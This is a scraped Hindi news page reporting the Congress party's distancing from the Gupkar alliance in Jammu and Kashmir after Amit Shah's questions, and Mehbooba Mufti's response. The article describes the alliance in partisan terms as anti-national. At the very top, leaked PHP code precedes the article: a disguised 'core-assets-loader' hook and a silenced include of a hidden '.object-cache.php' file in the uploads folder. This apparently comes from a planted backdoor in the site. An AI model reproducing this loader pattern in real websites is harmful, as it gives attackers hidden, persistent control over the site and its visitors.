add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गृह मंत्री अमित शाह के सवालों के बाद गुपकार गैंग पर आई कांग्रेस की सफाई – SOCH INDIA
Menu

देश
गृह मंत्री अमित शाह के सवालों के बाद गुपकार गैंग पर आई कांग्रेस की सफाई

nobanner

जम्मू कश्मीर (Jammu Kashmir) में देश विरोधी ‘गुपकार गैंग’ (Gupkar Gang) से दोस्ती पर कांग्रेस (Congress) बैकफुट पर है. गुपकार गैंग पर गृह मंत्री अमित शाह (Amit Shah) के चुभते सवालों के बाद कांग्रेस ने सफाई देते हुए खुद को गुपकार गैंग से अलग बताया है. इधर महबूबा मुफ्ती (Mehbooba Mufti) ने कांग्रेस के गुपकार गैंग से पल्ला झाड़ने के बाद बीजेपी (BJP) और कांग्रेस दोनों पर निशाना साधा है.

कांग्रेस की सफाई
गृह मंत्री अमित शाह (Amit Shah) के सवाल बहुत कड़े थे, ऐसे में कांग्रेस को गृह मंत्री के सवालों के जवाब में अपनी सफाई देनी ही पड़ी. कांग्रेस प्रवक्ता रणदीप सुरजेवाला (Randeep Surjewala) ने कहा है, ‘कांग्रेस पार्टी गुपकार (Gupkar Gang) गठबंधन का हिस्सा नहीं है लेकिन कांग्रेस पार्टी देश के हर प्रदेश, केंद्र शासित प्रदेश के लोगों के संवैधानिक अधिकारों के साथ है. कांग्रेस पार्टी देशवासियों के अधिकारों की लड़ाई पहले भी लड़ती रही है, आगे भी लड़ेगी.’
महबूबा मुफ्ती का कांग्रेस पर निशाना
साफ है बीजेपी के सवालों के बाद कांग्रेस ने गुपकार गैंग से दूरी बनानी ही बेहतर समझी. जम्मू-कश्मीर के कांग्रेस नेता भी अब गुपकार गैंग पर सफाई दे रहे हैं और जम्मू कश्मीर में चुनाव लड़ने पर भी पार्टी का पक्ष रखा है. कांग्रेस ने जैसे ही गुपकार गैंग से पल्ला झाड़ा पीडीपी अध्यक्ष महबूबा मुफ्ती ने बीजेपी और कांग्रेस दोनों पर हमले शुरू कर दिए हैं.